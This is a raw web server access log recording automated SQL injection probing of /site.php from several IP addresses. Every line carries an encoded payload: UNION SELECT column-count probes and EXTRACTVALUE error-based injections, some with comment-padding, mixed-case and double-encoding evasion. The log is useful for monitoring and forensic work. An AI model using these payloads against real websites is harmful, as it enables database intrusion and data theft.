190.97.249.46 - - [17/Aug/2026:18:33:52 -0400] "GET /site.php?linkid=-305%27%20UNION%20ALL%20SELECT%20NULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27--%20a6nxn7&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
170.82.105.201 - - [17/Aug/2026:18:33:52 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F*%2150000AND*%2F%28%27phxjlb%27%3D%27phxjlb%27%2F*%2150000AND*%2FEXTRACTVALUE%286608%2C%2F*%2150000CONCAT*%2F%280x7e%2C%28%28%2F*%2150000SELECT*%2F%28ELT%286608%3D6608%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:33:52 -0400] "GET /site.php?linkid=%29%20AND%20%28758424632%3D758424632AND%20EXTRACTVALUE%284412%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%284412%3D4412%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:33:53 -0400] "GET /site.php?linkid=%29%2F**%2FAND%2F**%2F%281551718712%3D1551718712AND%2F**%2FEXTRACTVALUE%284412%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%284412%3D4412%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:33:53 -0400] "GET /site.php?linkid=305&srsltid=%C3%80%C2%A7%C3%80%C2%A2%252527%29%2F**%2FAND%2F**%2F%28%C3%80%C2%A7%C3%80%C2%A2%252527fvgrkt%C3%80%C2%A7%C3%80%C2%A2%252527%3D%C3%80%C2%A7%C3%80%C2%A2%252527fvgrkt%C3%80%C2%A7%C3%80%C2%A2%252527AND%2F**%2FEXTRACTVALUE%286608%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%286608%3D6608%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:33:53 -0400] "GET /site.php?linkid=305%20UNION%20ALL%20SELECT%20%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL--%20lpyy8p&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
190.104.124.40 - - [17/Aug/2026:18:33:53 -0400] "GET /site.php?linkid=%29%2F**%2FaNd%2F**%2F%281360147847%3D1360147847AND%2F**%2FeXtRaCtVAlUe%284412%2CcONcaT%280x7E%2C%28%28SElecT%2F**%2F%28ELt%284412%3D4412%2C1%29%29%29%29%2C0X7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:33:53 -0400] "GET /site.php?linkid=305&srsltid=%252527%29%2F**%2FAND%2F**%2F%28%252527wGcKRF%252527%3D%252527WgCkRF%252527AND%2F**%2FEXTRACTVALUE%286608%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%286608%3D6608%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:33:53 -0400] "GET /site.php?linkid=%29%2F*%2150000AND*%2F%281207570421%3D1207570421AND%2F**%2FEXTRACTVALUE%284412%2C%2F*%2150000CONCAT*%2F%280x7e%2C%28%28%2F*%2150000SELECT*%2F%28ELT%284412%3D4412%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:33:54 -0400] "GET /site.php?linkid=-305%20UNION%20ALL%20SELECT%20%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL--%20lpyy8p&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
170.82.105.201 - - [17/Aug/2026:18:33:54 -0400] "GET /site.php?linkid=305&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5%25%27%20AND%20EXTRACTVALUE%282218%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%282218%3D2218%2C1%29%29%29%29%2C0x7e%29%29--%20- HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:33:54 -0400] "GET /site.php?linkid=%29%2F**%2FAND%2F**%2F%281738845431%3D1738845431AND%2F**%2FEXTRACTVALUE%284412%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%284412%3D4412%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:33:54 -0400] "GET /site.php?linkid=305%20UNION%20ALL%20SELECT%20NULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL--%208nid9f&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
190.104.124.40 - - [17/Aug/2026:18:33:54 -0400] "GET /site.php?linkid=%29%2F**%2FANd%2F**%2F%28639478953%3D639478953And%2F**%2FExTRacTvaLUE%284412%2CCoNCat%280x7E%2C%28%28Select%2F**%2F%28ElT%284412%3D4412%2C1%29%29%29%29%2C0X7E%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:33:54 -0400] "GET /site.php?linkid=305&srsltid=%27%29%20AND%20%28%27nhgbpx%27%3D%27nhgbpx%27AND%20EXTRACTVALUE%282218%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%282218%3D2218%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:33:55 -0400] "GET /site.php?linkid=305%25%22%20AND%20EXTRACTVALUE%281897%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%281897%3D1897%2C1%29%29%29%29%2C0x7e%29%29--%20-&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:33:55 -0400] "GET /site.php?linkid=-305%20UNION%20ALL%20SELECT%20NULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL--%208nid9f&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
190.104.124.40 - - [17/Aug/2026:18:33:55 -0400] "GET /site.php?linkid=%29%20AND%20%28457546767%3D457546767AND%20EXTRACTVALUE%281897%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%281897%3D1897%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:33:55 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F**%2FAND%2F**%2F%28%27oqtomy%27%3D%27oqtomy%27AND%2F**%2FEXTRACTVALUE%282218%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%282218%3D2218%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:33:55 -0400] "GET /site.php?linkid=%29%2F**%2FAND%2F**%2F%281274796963%3D1274796963AND%2F**%2FEXTRACTVALUE%281897%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%281897%3D1897%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
61.2.145.48 - - [17/Aug/2026:18:33:55 -0400] "GET /site.php?linkid=305&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5%27%20UNION%20ALL%20SELECT%20%27tkfgaycxxxwsjaqwcexwmrxgrbpdhkxh%27%2CNULL--%20a6nxn7 HTTP/1.1" 302 215
190.97.249.46 - - [17/Aug/2026:18:33:55 -0400] "GET /site.php?linkid=305%20UNION%20ALL%20SELECT%20NULL%2CNULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27--%202tw4k7&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
170.82.105.201 - - [17/Aug/2026:18:33:56 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F**%2FAND%2F**%2F%28%27LLJYfD%27%3D%27lLjyfd%27AND%2F**%2FEXTRACTVALUE%282218%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%282218%3D2218%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:33:56 -0400] "GET /site.php?linkid=%29%2F**%2FaND%2F**%2F%281903259785%3D1903259785aNd%2F**%2FExTracTVaLUe%281897%2CcoNcaT%280x7e%2C%28%28SelECt%2F**%2F%28ElT%281897%3D1897%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:33:56 -0400] "GET /site.php?linkid=%29%2F*%2150000AND*%2F%28755080978%3D755080978AND%2F**%2FEXTRACTVALUE%281897%2C%2F*%2150000CONCAT*%2F%280x7e%2C%28%28%2F*%2150000SELECT*%2F%28ELT%281897%3D1897%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:33:56 -0400] "GET /site.php?linkid=-305%20UNION%20ALL%20SELECT%20NULL%2CNULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27--%202tw4k7&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
170.82.105.201 - - [17/Aug/2026:18:33:56 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F*%2150000AND*%2F%28%27ctytux%27%3D%27ctytux%27%2F*%2150000AND*%2FEXTRACTVALUE%282218%2C%2F*%2150000CONCAT*%2F%280x7e%2C%28%28%2F*%2150000SELECT*%2F%28ELT%282218%3D2218%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:33:57 -0400] "GET /site.php?linkid=305&srsltid=%C3%80%C2%A7%C3%80%C2%A2%252527%29%2F**%2FAND%2F**%2F%28%C3%80%C2%A7%C3%80%C2%A2%252527umghad%C3%80%C2%A7%C3%80%C2%A2%252527%3D%C3%80%C2%A7%C3%80%C2%A2%252527umghad%C3%80%C2%A7%C3%80%C2%A2%252527AND%2F**%2FEXTRACTVALUE%282218%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%282218%3D2218%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:33:57 -0400] "GET /site.php?linkid=%29%2F**%2FAND%2F**%2F%281963975372%3D1963975372AND%2F**%2FEXTRACTVALUE%281897%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%281897%3D1897%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:33:57 -0400] "GET /site.php?linkid=305%27%20UNION%20ALL%20SELECT%20%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL--%20lpyy8p&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
190.104.124.40 - - [17/Aug/2026:18:33:57 -0400] "GET /site.php?linkid=%29%2F**%2FANd%2F**%2F%28162098597%3D162098597AnD%2F**%2FExTracTVALuE%281897%2CcOnCAt%280X7e%2C%28%28sELeCT%2F**%2F%28ELT%281897%3D1897%2C1%29%29%29%29%2C0X7E%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:33:57 -0400] "GET /site.php?linkid=305&srsltid=%252527%29%2F**%2FAND%2F**%2F%28%252527GqsUyv%252527%3D%252527gQSuYV%252527AND%2F**%2FEXTRACTVALUE%282218%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%282218%3D2218%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:33:57 -0400] "GET /site.php?linkid=-305%27%20UNION%20ALL%20SELECT%20%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL--%20lpyy8p&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
190.104.124.40 - - [17/Aug/2026:18:33:57 -0400] "GET /site.php?linkid=305%60%20AND%20EXTRACTVALUE%285785%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%285785%3D5785%2C1%29%29%29%29%2C0x7e%29%29--%20-&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:33:58 -0400] "GET /site.php?linkid=305&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5%22%20AND%20EXTRACTVALUE%284629%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%284629%3D4629%2C1%29%29%29%29%2C0x7e%29%29--%20- HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:33:58 -0400] "GET /site.php?linkid=%29%20AND%20%281063547215%3D1063547215AND%20EXTRACTVALUE%285785%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%285785%3D5785%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:33:58 -0400] "GET /site.php?linkid=305&srsltid=%27%29%20AND%20%28%27igpbop%27%3D%27igpbop%27AND%20EXTRACTVALUE%284629%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%284629%3D4629%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:33:58 -0400] "GET /site.php?linkid=%29%2F**%2FAND%2F**%2F%281231585039%3D1231585039AND%2F**%2FEXTRACTVALUE%285785%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%285785%3D5785%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:33:58 -0400] "GET /site.php?linkid=305%27%20UNION%20ALL%20SELECT%20NULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL--%208nid9f&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
190.104.124.40 - - [17/Aug/2026:18:33:59 -0400] "GET /site.php?linkid=%29%2F**%2FAnd%2F**%2F%2879321315%3D79321315And%2F**%2FExTrAcTVALUE%285785%2CConCAT%280X7E%2C%28%28SEleCt%2F**%2F%28eLT%285785%3D5785%2C1%29%29%29%29%2C0X7E%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:33:59 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F**%2FAND%2F**%2F%28%27kdgail%27%3D%27kdgail%27AND%2F**%2FEXTRACTVALUE%284629%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%284629%3D4629%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:33:59 -0400] "GET /site.php?linkid=-305%27%20UNION%20ALL%20SELECT%20NULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL--%208nid9f&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
190.104.124.40 - - [17/Aug/2026:18:33:59 -0400] "GET /site.php?linkid=%29%2F*%2150000AND*%2F%281624618764%3D1624618764AND%2F**%2FEXTRACTVALUE%285785%2C%2F*%2150000CONCAT*%2F%280x7e%2C%28%28%2F*%2150000SELECT*%2F%28ELT%285785%3D5785%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:33:59 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F**%2FAND%2F**%2F%28%27wtdbUC%27%3D%27WTdBuC%27AND%2F**%2FEXTRACTVALUE%284629%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%284629%3D4629%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:33:59 -0400] "GET /site.php?linkid=%29%2F**%2FAND%2F**%2F%281207389333%3D1207389333AND%2F**%2FEXTRACTVALUE%285785%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%285785%3D5785%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:33:59 -0400] "GET /site.php?linkid=305%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27--%202tw4k7&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
61.2.145.48 - - [17/Aug/2026:18:33:59 -0400] "GET /site.php?linkid=305&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5%27%20UNION%20ALL%20SELECT%20NULL%2C%27tkfgaycxxxwsjaqwcexwmrxgrbpdhkxh%27--%20c81t3c HTTP/1.1" 302 215
190.104.124.40 - - [17/Aug/2026:18:34:00 -0400] "GET /site.php?linkid=%29%2F**%2FAND%2F**%2F%28199899271%3D199899271AnD%2F**%2FExTRACTVALue%285785%2CConcat%280x7e%2C%28%28sElEct%2F**%2F%28ELt%285785%3D5785%2C1%29%29%29%29%2C0x7E%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:34:00 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F*%2150000AND*%2F%28%27eaarsi%27%3D%27eaarsi%27%2F*%2150000AND*%2FEXTRACTVALUE%284629%2C%2F*%2150000CONCAT*%2F%280x7e%2C%28%28%2F*%2150000SELECT*%2F%28ELT%284629%3D4629%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:00 -0400] "GET /site.php?linkid=305%29%20AND%20EXTRACTVALUE%289628%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%289628%3D9628%2C1%29%29%29%29%2C0x7e%29%29--%20-&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:34:00 -0400] "GET /site.php?linkid=-305%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27--%202tw4k7&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
170.82.105.201 - - [17/Aug/2026:18:34:00 -0400] "GET /site.php?linkid=305&srsltid=%C3%80%C2%A7%C3%80%C2%A2%252527%29%2F**%2FAND%2F**%2F%28%C3%80%C2%A7%C3%80%C2%A2%252527cmdtqx%C3%80%C2%A7%C3%80%C2%A2%252527%3D%C3%80%C2%A7%C3%80%C2%A2%252527cmdtqx%C3%80%C2%A7%C3%80%C2%A2%252527AND%2F**%2FEXTRACTVALUE%284629%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%284629%3D4629%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:01 -0400] "GET /site.php?linkid=%29%20AND%20%281456142661%3D1456142661AND%20EXTRACTVALUE%289628%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%289628%3D9628%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:34:01 -0400] "GET /site.php?linkid=305%20UNION%20ALL%20SELECT%20%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL%2CNULL--%20wnnc40&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
170.82.105.201 - - [17/Aug/2026:18:34:01 -0400] "GET /site.php?linkid=305&srsltid=%252527%29%2F**%2FAND%2F**%2F%28%252527CvujiM%252527%3D%252527CVujIM%252527AND%2F**%2FEXTRACTVALUE%284629%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%284629%3D4629%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:01 -0400] "GET /site.php?linkid=%29%2F**%2FAND%2F**%2F%28965925921%3D965925921AND%2F**%2FEXTRACTVALUE%289628%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%289628%3D9628%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:34:01 -0400] "GET /site.php?linkid=-305%20UNION%20ALL%20SELECT%20%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL%2CNULL--%20wnnc40&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
190.104.124.40 - - [17/Aug/2026:18:34:01 -0400] "GET /site.php?linkid=%29%2F**%2FaNd%2F**%2F%28309600564%3D309600564ANd%2F**%2FexTRactValUe%289628%2CConCaT%280X7e%2C%28%28select%2F**%2F%28eLT%289628%3D9628%2C1%29%29%29%29%2C0x7E%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:34:01 -0400] "GET /site.php?linkid=305&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5%25%22%20AND%20EXTRACTVALUE%289344%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%289344%3D9344%2C1%29%29%29%29%2C0x7e%29%29--%20- HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:02 -0400] "GET /site.php?linkid=%29%2F*%2150000AND*%2F%281149665016%3D1149665016AND%2F**%2FEXTRACTVALUE%289628%2C%2F*%2150000CONCAT*%2F%280x7e%2C%28%28%2F*%2150000SELECT*%2F%28ELT%289628%3D9628%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:34:02 -0400] "GET /site.php?linkid=305%20UNION%20ALL%20SELECT%20NULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL--%20ttqwmi&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
170.82.105.201 - - [17/Aug/2026:18:34:02 -0400] "GET /site.php?linkid=305&srsltid=%27%29%20AND%20%28%27tyaajk%27%3D%27tyaajk%27AND%20EXTRACTVALUE%289344%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%289344%3D9344%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:02 -0400] "GET /site.php?linkid=%29%2F**%2FAND%2F**%2F%28765730192%3D765730192AND%2F**%2FEXTRACTVALUE%289628%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%289628%3D9628%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.97.249.46 - - [17/Aug/2026:18:34:02 -0400] "GET /site.php?linkid=-305%20UNION%20ALL%20SELECT%20NULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL--%20ttqwmi&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
170.82.105.201 - - [17/Aug/2026:18:34:02 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F**%2FAND%2F**%2F%28%27cwflrt%27%3D%27cwflrt%27AND%2F**%2FEXTRACTVALUE%289344%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%289344%3D9344%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:02 -0400] "GET /site.php?linkid=%29%2F**%2FanD%2F**%2F%281539540769%3D1539540769and%2F**%2FExtractVALUE%289628%2CConCAt%280X7e%2C%28%28SeLecT%2F**%2F%28eLt%289628%3D9628%2C1%29%29%29%29%2C0X7E%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
61.2.145.48 - - [17/Aug/2026:18:34:03 -0400] "GET /site.php?linkid=305&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5%27%20UNION%20ALL%20SELECT%20NULL%2C%27tkfgaycxxxwsjaqwcexwmrxgrbpdhkxh%27--%20c81t3c HTTP/1.1" 302 215
190.104.124.40 - - [17/Aug/2026:18:34:03 -0400] "GET /site.php?linkid=305%27%29%20AND%20EXTRACTVALUE%281101%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%281101%3D1101%2C1%29%29%29%29%2C0x7e%29%29--%20-&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:34:03 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F**%2FAND%2F**%2F%28%27QQAAbW%27%3D%27qqAAbW%27AND%2F**%2FEXTRACTVALUE%289344%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%289344%3D9344%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
